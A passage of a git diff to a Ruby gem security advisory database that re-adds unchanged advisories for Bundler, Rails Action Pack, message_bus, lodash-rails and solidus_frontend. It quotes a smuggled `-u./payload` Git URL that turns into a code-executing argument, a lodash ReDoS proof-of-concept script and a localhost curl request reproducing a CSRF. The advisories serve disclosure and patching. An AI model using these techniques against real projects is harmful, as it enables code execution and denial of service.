+    of a positional one. This can lead to Code Execution because some of the commands have
+    options that can be leveraged to run arbitrary executables.
+
+    Since this value comes from the `Gemfile` file, it can contain any character, including
+    a leading dash.
+
+    ### Exploitation
+
+    To exploit this vulnerability, an attacker has to craft a directory containing a
+    `Gemfile` file that declares a dependency that is located in a Git repository. This
+    dependency has to have a Git URL in the form of `-u./payload`. This URL will be used to
+    construct a Git clone command but will be interpreted as the
+    [upload-pack](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt--ultupload-packgt)
+    argument. Then this directory needs to be shared with the victim, who then needs to run
+    a command that evaluates the Gemfile, such as `bundle lock`, inside.
+
+    ### Impact
+
+    This vulnerability can lead to Arbitrary Code Execution, which could potentially lead
+    to the takeover of the system. However, as explained above, the exploitability is very
+    low, because it requires a lot of user interaction. It still could put developers at
+    risk when dealing with untrusted files in a way they think is safe, because the exploit
+    still works when the victim tries to make sure nothing can happen, e.g. by manually
+    reviewing the `Gemfile` (although they would need the weird URL with a leading dash to
+    not raise any flags).
+
+    This kind of attack vector
+    [has been used in the past](https://www.cnbc.com/2021/01/26/north-korean-hackers-targeting-security-researchers-on-twitter.html)
+    to target security researchers by sending them projects to collaborate on.
+
+    ### Patches
+
+    Bundler 2.2.33 has patched this problem by inserting `--` as an argument before any
+    positional arguments to those Git commands that were affected by this issue.
+
+    ### Workarounds
+
+    Regardless of whether users can upgrade or not, they should review any untrusted
+    `Gemfile`'s before running any `bundler` commands that may read them, since they
+    can contain arbitrary ruby code.
+  cvss_v3: 6.7
+  patched_versions:
+  - ">= 2.2.33"
+  related:
+    url:
+    - https://github.com/rubygems/rubygems/pull/5142
+    - https://github.com/rubygems/rubygems/commit/0fad1ccfe9dd7a3c5b82c1496df3c2b4842870d3
+    - https://github.com/rubygems/rubygems/commit/a4f2f8ac17e6ce81c689527a8b6f14381060d95f
+    - https://cwe.mitre.org/data/definitions/88.html
+---
diff --git a/advisories/_posts/2021-12-14-CVE-2021-44528.md b/advisories/_posts/2021-12-14-CVE-2021-44528.md
index 02890bf0..dac87ffc 100644
--- a/advisories/_posts/2021-12-14-CVE-2021-44528.md
+++ b/advisories/_posts/2021-12-14-CVE-2021-44528.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2021-44528 (actionpack): Possible Open Redirect in Host Authorization
-  Middleware'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-44528
-  ghsa: qphc-hf5q-v8fc
-  url: https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ
-  title: Possible Open Redirect in Host Authorization Middleware
-  date: 2021-12-14
-  description: |
-    There is a possible open redirect vulnerability in the Host Authorization
-    middleware in Action Pack.
-
-    Specially crafted "X-Forwarded-Host" headers in combination with certain
-    "allowed host" formats can cause the Host Authorization middleware in Action
-    Pack to redirect users to a malicious website.
-
-    Impacted applications will have allowed hosts with a leading dot. For example,
-    configuration files that look like this:
-
-    ```
-    config.hosts <<  '.EXAMPLE.com'
-    ```
-
-    When an allowed host contains a leading dot, a specially crafted Host header
-    can be used to redirect to a malicious website.
-
-    This vulnerability is similar to CVE-2021-22881 and CVE-2021-22942.
-
-    Releases
-    --------
-    The fixed releases are available at the normal locations.
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 6-0-host-authorzation-open-redirect.patch - Patch for 6.0 series
-    * 6-1-host-authorzation-open-redirect.patch - Patch for 6.1 series
-    * 7-0-host-authorzation-open-redirect.patch - Patch for 7.0 series
-
-    Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at
-    present. Users of earlier unsupported releases are advised to upgrade as soon
-    as possible as we cannot guarantee the continued availability of security
-    fixes for unsupported releases.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - "~> 6.0.4, >= 6.0.4.2"
-  - "~> 6.1.4, >= 6.1.4.2"
-  - ">= 7.0.0.rc2"
-  related:
-    cve:
-    - 2021-22881
-    - 2021-22942
-    url:
-    - https://github.com/rails/rails/commit/aecba3c301b80e9d5a63c30ea1b287bceaf2c107
-    - https://github.com/rails/rails/blob/v6.1.4.2/actionpack/CHANGELOG.md#rails-6142-december-14-2021
----
+---
+layout: advisory
+title: 'CVE-2021-44528 (actionpack): Possible Open Redirect in Host Authorization
+  Middleware'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-44528
+  ghsa: qphc-hf5q-v8fc
+  url: https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ
+  title: Possible Open Redirect in Host Authorization Middleware
+  date: 2021-12-14
+  description: |
+    There is a possible open redirect vulnerability in the Host Authorization
+    middleware in Action Pack.
+
+    Specially crafted "X-Forwarded-Host" headers in combination with certain
+    "allowed host" formats can cause the Host Authorization middleware in Action
+    Pack to redirect users to a malicious website.
+
+    Impacted applications will have allowed hosts with a leading dot. For example,
+    configuration files that look like this:
+
+    ```
+    config.hosts <<  '.EXAMPLE.com'
+    ```
+
+    When an allowed host contains a leading dot, a specially crafted Host header
+    can be used to redirect to a malicious website.
+
+    This vulnerability is similar to CVE-2021-22881 and CVE-2021-22942.
+
+    Releases
+    --------
+    The fixed releases are available at the normal locations.
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 6-0-host-authorzation-open-redirect.patch - Patch for 6.0 series
+    * 6-1-host-authorzation-open-redirect.patch - Patch for 6.1 series
+    * 7-0-host-authorzation-open-redirect.patch - Patch for 7.0 series
+
+    Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at
+    present. Users of earlier unsupported releases are advised to upgrade as soon
+    as possible as we cannot guarantee the continued availability of security
+    fixes for unsupported releases.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - "~> 6.0.4, >= 6.0.4.2"
+  - "~> 6.1.4, >= 6.1.4.2"
+  - ">= 7.0.0.rc2"
+  related:
+    cve:
+    - 2021-22881
+    - 2021-22942
+    url:
+    - https://github.com/rails/rails/commit/aecba3c301b80e9d5a63c30ea1b287bceaf2c107
+    - https://github.com/rails/rails/blob/v6.1.4.2/actionpack/CHANGELOG.md#rails-6142-december-14-2021
+---
diff --git a/advisories/_posts/2021-12-17-CVE-2021-43840.md b/advisories/_posts/2021-12-17-CVE-2021-43840.md
index cf4df775..087bc91e 100644
--- a/advisories/_posts/2021-12-17-CVE-2021-43840.md
+++ b/advisories/_posts/2021-12-17-CVE-2021-43840.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2021-43840 (message_bus): Path traversal when MessageBus::Diagnostics
-  is enabled'
-comments: false
-categories:
-- message_bus
-advisory:
-  gem: message_bus
-  cve: 2021-43840
-  ghsa: xmgj-5fh3-xjmm
-  url: https://github.com/discourse/message_bus/security/advisories/GHSA-xmgj-5fh3-xjmm
-  title: Path traversal when MessageBus::Diagnostics is enabled
-  date: 2021-12-17
-  description: |
-    ### Impact
-
-    Users who deployed message bus with diagnostics features enabled (default off) were
-    vulnerable to a path traversal bug, which could lead to disclosure of secret
-    information on a machine if an unintended user were to gain access to the diagnostic
-    route. The impact is also greater if there is no proxy for your web application as
-    the number of steps up the directories is not bounded. For deployments which uses a
-    proxy, the impact varies. For example, If a request goes through a proxy like Nginx
-    with `merge_slashes` enabled, the number of steps up the directories that can be
-    read is limited to 3 levels.
-
-    ### Workarounds
-
-    Disable MessageBus::Diagnostics in production like environments.
-  cvss_v3: 4.2
-  patched_versions:
-  - ">= 3.3.7"
-  related:
-    url:
-    - https://github.com/discourse/message_bus/commit/9b6deee01ed474c7e9b5ff65a06bb0447b4db2ba
----
+---
+layout: advisory
+title: 'CVE-2021-43840 (message_bus): Path traversal when MessageBus::Diagnostics
+  is enabled'
+comments: false
+categories:
+- message_bus
+advisory:
+  gem: message_bus
+  cve: 2021-43840
+  ghsa: xmgj-5fh3-xjmm
+  url: https://github.com/discourse/message_bus/security/advisories/GHSA-xmgj-5fh3-xjmm
+  title: Path traversal when MessageBus::Diagnostics is enabled
+  date: 2021-12-17
+  description: |
+    ### Impact
+
+    Users who deployed message bus with diagnostics features enabled (default off) were
+    vulnerable to a path traversal bug, which could lead to disclosure of secret
+    information on a machine if an unintended user were to gain access to the diagnostic
+    route. The impact is also greater if there is no proxy for your web application as
+    the number of steps up the directories is not bounded. For deployments which uses a
+    proxy, the impact varies. For example, If a request goes through a proxy like Nginx
+    with `merge_slashes` enabled, the number of steps up the directories that can be
+    read is limited to 3 levels.
+
+    ### Workarounds
+
+    Disable MessageBus::Diagnostics in production like environments.
+  cvss_v3: 4.2
+  patched_versions:
+  - ">= 3.3.7"
+  related:
+    url:
+    - https://github.com/discourse/message_bus/commit/9b6deee01ed474c7e9b5ff65a06bb0447b4db2ba
+---
diff --git a/advisories/_posts/2022-01-06-CVE-2020-28500.md b/advisories/_posts/2022-01-06-CVE-2020-28500.md
index a406de56..f45e45f0 100644
--- a/advisories/_posts/2022-01-06-CVE-2020-28500.md
+++ b/advisories/_posts/2022-01-06-CVE-2020-28500.md
@@ -1,68 +1,68 @@
----
-layout: advisory
-title: 'CVE-2020-28500 (lodash-rails): Regular Expression Denial of Service (ReDoS)
-  in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2020-28500
-  ghsa: 29mw-wpgm-hmr9
-  url: https://github.com/advisories/GHSA-29mw-wpgm-hmr9
-  title: Regular Expression Denial of Service (ReDoS) in lodash
-  date: 2022-01-06
-  description: |
-    All versions of package lodash prior to 4.17.21 are vulnerable
-    to Regular Expression Denial of Service (ReDoS) via the
-    `toNumber`, `trim` and `trimEnd` functions.
-
-    Steps to reproduce (provided by reporter Liyuan Chen):
-
-    ```
-      var lo = require('lodash');
-
-      function build_blank(n) {
-         var ret = "1"
-         for (var i = 0; i < n; i++) {
-             ret += " "
-         }
-         return ret + "1";
-     }
-     var s = build_blank(50000) var time0 = Date.now();
-     lo.trim(s)
-     var time_cost0 = Date.now() - time0;
-     console.log("time_cost0: " + time_cost0);
-     var time1 = Date.now();
-     lo.toNumber(s) var time_cost1 = Date.now() - time1;
-     console.log("time_cost1: " + time_cost1);
-     var time2 = Date.now();
-     lo.trimEnd(s);
-     var time_cost2 = Date.now() - time2;
-     console.log("time_cost2: " + time_cost2);
-    ```
-  cvss_v2: 5.0
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 4.17.21"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-28500
-    - https://github.com/lodash/lodash/pull/5065
-    - https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
-    - https://github.com/lodash/lodash/blob/npm/trimEnd.js
-    - https://snyk.io/vuln/SNYK-JS-LODASH-1018905
-    - https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
-    - https://www.oracle.com//security-alerts/cpujul2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
-    - https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
-    - https://security.netapp.com/advisory/ntap-20210312-0006
-    - https://github.com/advisories/GHSA-29mw-wpgm-hmr9
----
+---
+layout: advisory
+title: 'CVE-2020-28500 (lodash-rails): Regular Expression Denial of Service (ReDoS)
+  in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2020-28500
+  ghsa: 29mw-wpgm-hmr9
+  url: https://github.com/advisories/GHSA-29mw-wpgm-hmr9
+  title: Regular Expression Denial of Service (ReDoS) in lodash
+  date: 2022-01-06
+  description: |
+    All versions of package lodash prior to 4.17.21 are vulnerable
+    to Regular Expression Denial of Service (ReDoS) via the
+    `toNumber`, `trim` and `trimEnd` functions.
+
+    Steps to reproduce (provided by reporter Liyuan Chen):
+
+    ```
+      var lo = require('lodash');
+
+      function build_blank(n) {
+         var ret = "1"
+         for (var i = 0; i < n; i++) {
+             ret += " "
+         }
+         return ret + "1";
+     }
+     var s = build_blank(50000) var time0 = Date.now();
+     lo.trim(s)
+     var time_cost0 = Date.now() - time0;
+     console.log("time_cost0: " + time_cost0);
+     var time1 = Date.now();
+     lo.toNumber(s) var time_cost1 = Date.now() - time1;
+     console.log("time_cost1: " + time_cost1);
+     var time2 = Date.now();
+     lo.trimEnd(s);
+     var time_cost2 = Date.now() - time2;
+     console.log("time_cost2: " + time_cost2);
+    ```
+  cvss_v2: 5.0
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 4.17.21"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-28500
+    - https://github.com/lodash/lodash/pull/5065
+    - https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
+    - https://github.com/lodash/lodash/blob/npm/trimEnd.js
+    - https://snyk.io/vuln/SNYK-JS-LODASH-1018905
+    - https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
+    - https://www.oracle.com//security-alerts/cpujul2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
+    - https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
+    - https://security.netapp.com/advisory/ntap-20210312-0006
+    - https://github.com/advisories/GHSA-29mw-wpgm-hmr9
+---
diff --git a/advisories/_posts/2022-01-06-CVE-2021-43846.md b/advisories/_posts/2022-01-06-CVE-2021-43846.md
index fd06f1dc..7fc6662a 100644
--- a/advisories/_posts/2022-01-06-CVE-2021-43846.md
+++ b/advisories/_posts/2022-01-06-CVE-2021-43846.md
@@ -1,339 +1,339 @@
----
-layout: advisory
-title: 'CVE-2021-43846 (solidus_frontend): CSRF forgery protection bypass in solidus_frontend'
-comments: false
-categories:
-- solidus_frontend
-advisory:
-  gem: solidus_frontend
-  cve: 2021-43846
-  ghsa: h3fg-h5v3-vf8m
-  url: https://github.com/solidusio/solidus/security/advisories/GHSA-h3fg-h5v3-vf8m
-  title: CSRF forgery protection bypass in solidus_frontend
-  date: 2022-01-06
-  description: |
-    ### Impact
-    CSRF vulnerability that allows a malicious site to add an item to the user's
-    cart without their knowledge.
-
-    All `solidus_frontend` versions are affected. If you're using your own
-    storefront, please, follow along to make sure you're not affected.
-
-    To reproduce the issue:
-
-    - Pick the id for a variant with available stock. From the rails console:
-
-    ```ruby
-    Spree::Variant.in_stock.pluck(:id)
-    ```
-
-    Say we pick variant id `2`.
-
-    - Launch your application, for instance,
-      on `http://localhost:3000`:
-
-    ```bash
-    bin/rails server
-    ```
-
-    - Open your browser dev tools.
-
-    - Click on whatever link in your store.
-
-    - Copy the value of the `Cookie` request header sent for the previous request
-    from your browser dev tools.
-
-    - Execute the following, using your previously selected variant id and the
-    value of the `Cookie` header (notice how it doesn't contain any authentication
-    token):
-
-    ```bash
-    curl -X POST -d "variant_id=2&quantity=1" -H "Cookie:
-    guest_token=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklrWlRVMWRQWnpKMVZVdFNXRzlPVW1aaWJHTjZZa0VpIiwiZXhwIjpudWxsLCJwdXIiOiJjb29raWUuZ3Vlc3RfdG9rZW4ifX0%3D--5006ba5d346f621c760a29b6a797bf351d17d1b8;
-    _sandbox_session=vhutu5%2FL9NmWrUpGc3DxrFA%2FFsQD1dHn1cNsD7nvE84zcjWf17Af4%2F%2F2Vab3md71b6KTb9NP6WktdXktpwH4eU01jEGIBXG5%2BMzW5nL0nb4W269qk1io4LYljvoOg8%2BZVll7oJCVkJLKKh0sSoS0Kg8j%2FCHHs%2BsShohP%2BGnA%2Bfr9Ub8H6HofpSmloSpsfHHygmX0ho03fEgzHJ4DD5wJctaNKwg7NhVikHh5kgIPPHl84OGCgv3p2oe9jR19HTxOKq7BtyvDd7XZsecWhkcfS8BPnvDDUWZG6qpAEFI5kWo81KkpSJ%2Bp6Q1HOo8%3D--n3G2vgaDG7VS%2B%2FhF--ZTjxBAkfGG3hpr4GRQ2S1Q%3D%3D;
-    __profilin=p%3Dt" http://localhost:3000/orders/populate
-    ```
-
-    - Reload your browser and look at how your cart got updated.
-
-    ### Patches
-
-    Please, upgrade `solidus` to versions `3.1.5`, `3.0.5` or `2.11.14`.
-
-    After upgrading, make sure you read the "Upgrade notes"  section below.
-
-    ### Upgrade notes
-
-    The patch adds CSRF token verification to the "Add to cart" action. Adding
-    forgery protection to a form that missed it can have some side effects.
-
-    #### `InvalidAuthenticityToken` errors
-
-    If you're using the `:exception` strategy, it's likely that after upgrading,
-    you'll see more `ActionController::InvalidAuthenticityToken` errors popping out
-    in your logs. Due to browser-side cache, a form can be re-rendered and sent without
-    any attached request cookie (for instance, when re-opening a mobile browser). That
-    will cause an authentication error, as the sent token won't match with the one in
-    the session (none in this case). That's a known problem in the Rails community (see
-    https://github.com/rails/rails/issues/21948), and, at this point, there's no perfect
-    solution.
-
-    Any attempt to mitigate the issue should be seen at the application level.
-    For an excellent survey of all the available options, take a look at
-    https://github.com/betagouv/demarches-simplifiees.fr/blob/5b4f7f9ae9eaf0ac94008b62f7047e4714626cf9/doc/adr-csrf-forgery.md.
-    The latter is a third-party link. As the information is relevant here, we're going
-    to copy it below, but it should be clear that all the credit goes to @kemenaran:
-
-    > # Protecting against request forgery using CRSF tokens
-    >
-    > ## Context
-    >
-    > Rails has CSRF protection enabled by default, to protect against POST-based CSRF attacks.
-    >
-    > To protect from this, Rails stores two copies of a random token (the so-named CSRF token) on each request:
-    > - one copy embedded in each HTML page,
-    > - another copy in the user session.
-    >
-    > When performing a POST request, Rails checks that the two copies match – and
-    > otherwise denies the request. This protects against an attacker that would
-    > generate a form secretly pointing to our website: the attacker can't read
-    > the token in the session, and so can't post a form with a valid token.
-    >
-    > The problem is that, much more often, this has false positives.
-    > There are several cases for that, including:
-    >
-    > 1. The web browser (often mobile) loads a page containing a form, then is
-    > closed by the user. Later, when the browser is re-opened, it restores the
-    > page from the cache. But the session cookie has expired, and so is not
-    > restored – so the copy of the CSRF token stored in the session is missing.
-    > When the user submits the form, they get an "InvalidAuthenticityToken"
-    > exception.
-    >
-    > 2. The user attempts to fill a form, and gets an error message (usually in
-    > response to a POST request). They close the browser. When the browser is
-    > re-opened, it attempts to restore the page. On Chrome this is blocked by the
-    > browser, because the browser denies retrying a (probably non-idempotent)
-    > POST request. Safari however happily retries the POST request – but without
-    > sending any cookies (in an attempt to avoid having unexpected side-effects).
-    > So the copy of the CSRF token in the session is missing (because no cookie
-    > was sent), and the user get an "InvalidAuthenticityToken" exception.
-    >
-    > ## Options considered
-    >
-    > ### Extend the session cookie duration
-    >
-    > We can configure the session cookie to be valid for a longer time (like 2
-    > weeks).
-    >
-    > Pros:
-    > - It solves 1., because when the browser restores the page, the session
-    > cookie is still valid.
-    >
-    > Cons:
-    > - Users would be signed-in for a much longer time by default, which has
-    > unacceptable security implications.
-    > - It doesn't solve 2. (because Safari doesn't send any cookie when restoring
-    > a page from a POST request)
-    >
-    > ### Change the cache parameters
-    >
-    > We can send a HTTP cache header stating 'Cache-Control: no-store, no-cache'.
-    > This instructs the browser to never keep any copy of the page, and to always
-    > make a request to the server to restore it.
-    >
-    > This solution was attempted during a year in production, and solved 1.
-    > – but also introduced another type of InvalidAuthenticityToken errors. In
-    > that scenario, the user attempts to fill a form, and gets an error message
-    > (usually in response to a POST request). They then navigate on another domain (like
-    > France Connect), then hit the "Back" button. Crossing back the domain boundary
-    > may cause the browser to either block the request or retry an invalid POST request.
-    >
-    > Pros:
-    > - It solves 1., because on relaunch the browser requests a fresh page again
-    > (instead of serving it from its cache), thus retrieving a fresh session and
-    > a fresh matching CSRF token.
-    >
-    > Cons:
-    > - It doesn't solve 2.
-    > - It causes another type of InvalidAuthenticityToken errors.
-    >
-    > ### Using a null-session strategy
-    >
-    > We can change the default protect_from_forgery strategy to :null_session.
-    > This makes the current request use an empty session for the request duration.
-    >
-    > Pros:
-    > - It kind of solves 1., by redirecting to a "Please sign-in" page
-    > when a stale form is submitted.
-    >
-    > Cons:
-    > - The user is asked to sign-in only after filling and submitting the form,
-    > losing their time and data
-    > - The user will not be redirected to their original page after signing-in
-    > - It has potential security implications: as the (potentically malicious)
-    > request runs anyway, variables cached by a controller before the Null
-    > session is created may allow the form submission to succeed anyway
-    > (https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails)
-    >
-    > ### Using a reset-session strategy
-    >
-    > We can change the default protect_from_forgery strategy to :reset_session.
-    > This clears the user session permanently, logging them out until they log in
-    > again.
-    >
-    > Pros:
-    > - It kind of solves 1., by redirecting to a "Please sign-in" page when a
-    > stale form is submitted.
-    >
-    > Cons:
-    > - A forgery error in a browser tab will disconnect the user in all its open
-    > tabs
-    > - It has potential security implications: as the (potentically malicious)
-    > request runs anyway, variables cached by a controller before the Null session
-    > is created may allow the form submission to succeed anyway
-    > (https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails)
-    > - It allows an attacker to disconnect an user on demand, which is not only
-    > inconvenient, but also has security implication (the attacker could then log
-    > the user on it's own attacker account, pretending to be the user account)
-    >
-    > ### Redirect to login form
-    >
-    > When a forgery error occurs, we can instead redirect to the login form.
-    >
-    > Pros:
-    > - It kind of solves 1., by redirecting to a "Please sign-in" page when a
-    > stale form is submitted (but the user data is lost).
-    > - It kind of solves 2., by redirecting to a "Please sign-in" page when a
-    > previously POSTed form is reloaded.
-    >
-    > Cons:
-    > - Not all forms require authentication – so for
-    > public forms there is no point redirecting to the login form.
-    > - The user will not be redirected to their original page after signing-in
-    > (because setting the redirect path is a state-changing action, and it is
-    > dangerous to let an unauthorized request changing the state – an attacker
-    > could control the path where an user is automatically redirected to.)
-    > - The implementation is finicky, and may introduce security errors.
-    > For instance, a naive implementation that catches the exception and
-    > redirect_to the sign-in page will prevent Devise from running a cleanup code
-    > – which means the user will still be logged, and the CSRF protection is
-    > bypassed. However a well-tested implementation that lets Devise code run
-    > should avoid these pittfalls.
-    >
-    > ### Using a long-lived cookie for CSRF tokens
-    >
-    > Instead of storing the CSRF token in the session cookie (which is deleted
-    > when the browser is closed), we can instead store it in a longer-lived
-    > cookie. For this we need to patch Rails.
-    >
-    > Pros:
-    > - It solves 1., because when the user submits a stale form, even if the
-    > session cookie because stale, the long-lived CSRF cookie is still valid.
-    >
-    > Cons:
-    > - It doesn't solve 2., because when Safari retries a POST request, it sends
-    > none of the cookies (not even long-lived ones).
-    > - Patching Rails may introduce security issues (now or in the future)
-
-    #### Broken behavior due to session expiration + template cache
-
-    Although pretty unlikely, you should make sure that your current setup for
-    cache/session expiration is compatible. The upgrade can break the addition
-    of products to the cart if both:
-
-    - The "Add to cart" form is being cached (usually along with the variant
-    information).
-
-    - A user session is reset at every or every few requests.
-
-    The token validation depends on the issuing and consuming sessions
-    being the same. If a product page is cached with the token in it, it can
-    become stale on a subsequent rendering if the session changes.
-
-    To check that you're safe, after having upgraded locally, go through the
-    following steps:
-
-    - Enable cache on dev mode:
-
-    ```bash
-    bin/rails dev:cache
-    ```
-
-    - Visit the page for a variant with stock.
-
-    - Reload that page several times.
-
-    - Click on the "Add to cart"  button.
-
-    - Remember to rerun `bin/rails dev:cache` to turn off cache again.
-
-    No error or session reset should happen.
-
-    Otherwise, you can try with:
-
-    - Revisiting how your session gets expired.
-    - Changing the caching strategy to exclude the token.
-
-    #### Using weaker CSRF protection strategies
-
-    It's also important to understand that a complete fix will only be in place
-    when using the `:exception` forgery protection strategy. The
-    `solidus_frontend` engine can't do pretty much anything otherwise. Using
-    weaker CSRF strategies should be an informed and limited decision made by the
-    application team. After the upgrade:
-
-    - An app using `:null_session` should also be safe, but there will be side
-    effects. That strategy runs with a null object session. As such, no order and
-    no user is found on it. A new `cart` state order is created in the database,
-    associated with no user. Next time the user visits the site, they won't find
-    any difference in its cart state.
-
-    - An app using `:reset_session` is not entirely safe. That strategy resets the
-    session. That means that registered users will be logged out. Next time a user
-    visits, they'll see the cart with the items added during the CSRF attack,
-    although it won't be associated with their account in the case of registered
-    users.
-
-    #### Reversing the update
-
-    If you still want to deploy the upgraded version before changing your
-    application code (if the latter is needed), you can add the following
-    workaround to your `config/application.rb` (however, take into account that
-    you'll keep being vulnerable):
-
-    ```ruby
-    config.after_initialize do
-      Spree::OrdersController.skip_before_action :verify_authenticity_token, only:
-        [:populate]
-    end
-    ```
-
-    ### Workarounds
-
-    If an upgrade is not an option, you can work around the issue by adding the
-    following to `config/application.rb`:
-
-    ```ruby
-    config.after_initialize do
-      Spree::OrdersController.protect_from_forgery with: ApplicationController.forgery_protection_strategy.name.demodulize.underscore.to_sym,
-        only: [:populate]
-    end
-    ```
-
-    However, go through the same safety check detailed on "Upgrade notes" above.
-
-    ### References
-
-    - [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf)
-    - [How CSRF tokens are generated and validated on Rails](https://medium.com/rubyinside/a-deep-dive-into-csrf-protection-in-rails-19fa0a42c0ef)
-    - [Solidus security](https://solidus.io/security/)
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 3.1.5"
-  - "~> 3.0.5"
-  - "~> 2.11.14"
-  related:
-    url:
-    - https://github.com/solidusio/solidus/commit/4d17cacf066d9492fc04eb3a0b16084b47376d81
-    - https://github.com/solidusio/solidus/commit/a1b9bf7f24f9b8684fc4d943eacb02b1926c77c6
----
+---
+layout: advisory
+title: 'CVE-2021-43846 (solidus_frontend): CSRF forgery protection bypass in solidus_frontend'
+comments: false
+categories:
+- solidus_frontend
+advisory:
+  gem: solidus_frontend
+  cve: 2021-43846
+  ghsa: h3fg-h5v3-vf8m
+  url: https://github.com/solidusio/solidus/security/advisories/GHSA-h3fg-h5v3-vf8m
+  title: CSRF forgery protection bypass in solidus_frontend
+  date: 2022-01-06
+  description: |
+    ### Impact
+    CSRF vulnerability that allows a malicious site to add an item to the user's
+    cart without their knowledge.
+
+    All `solidus_frontend` versions are affected. If you're using your own
+    storefront, please, follow along to make sure you're not affected.
+
+    To reproduce the issue:
+
+    - Pick the id for a variant with available stock. From the rails console:
+
+    ```ruby
+    Spree::Variant.in_stock.pluck(:id)
+    ```
+
+    Say we pick variant id `2`.
+
+    - Launch your application, for instance,
+      on `http://localhost:3000`:
+
+    ```bash
+    bin/rails server
+    ```
+
+    - Open your browser dev tools.
+
+    - Click on whatever link in your store.
+
+    - Copy the value of the `Cookie` request header sent for the previous request
+    from your browser dev tools.
+
+    - Execute the following, using your previously selected variant id and the
+    value of the `Cookie` header (notice how it doesn't contain any authentication
+    token):
+
+    ```bash
+    curl -X POST -d "variant_id=2&quantity=1" -H "Cookie:
+    guest_token=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklrWlRVMWRQWnpKMVZVdFNXRzlPVW1aaWJHTjZZa0VpIiwiZXhwIjpudWxsLCJwdXIiOiJjb29raWUuZ3Vlc3RfdG9rZW4ifX0%3D--5006ba5d346f621c760a29b6a797bf351d17d1b8;
+    _sandbox_session=vhutu5%2FL9NmWrUpGc3DxrFA%2FFsQD1dHn1cNsD7nvE84zcjWf17Af4%2F%2F2Vab3md71b6KTb9NP6WktdXktpwH4eU01jEGIBXG5%2BMzW5nL0nb4W269qk1io4LYljvoOg8%2BZVll7oJCVkJLKKh0sSoS0Kg8j%2FCHHs%2BsShohP%2BGnA%2Bfr9Ub8H6HofpSmloSpsfHHygmX0ho03fEgzHJ4DD5wJctaNKwg7NhVikHh5kgIPPHl84OGCgv3p2oe9jR19HTxOKq7BtyvDd7XZsecWhkcfS8BPnvDDUWZG6qpAEFI5kWo81KkpSJ%2Bp6Q1HOo8%3D--n3G2vgaDG7VS%2B%2FhF--ZTjxBAkfGG3hpr4GRQ2S1Q%3D%3D;
+    __profilin=p%3Dt" http://localhost:3000/orders/populate
+    ```
+
+    - Reload your browser and look at how your cart got updated.
+
+    ### Patches
+
+    Please, upgrade `solidus` to versions `3.1.5`, `3.0.5` or `2.11.14`.
+
+    After upgrading, make sure you read the "Upgrade notes"  section below.
+
+    ### Upgrade notes
+
+    The patch adds CSRF token verification to the "Add to cart" action. Adding
+    forgery protection to a form that missed it can have some side effects.
+
+    #### `InvalidAuthenticityToken` errors
+
+    If you're using the `:exception` strategy, it's likely that after upgrading,
+    you'll see more `ActionController::InvalidAuthenticityToken` errors popping out
+    in your logs. Due to browser-side cache, a form can be re-rendered and sent without
+    any attached request cookie (for instance, when re-opening a mobile browser). That
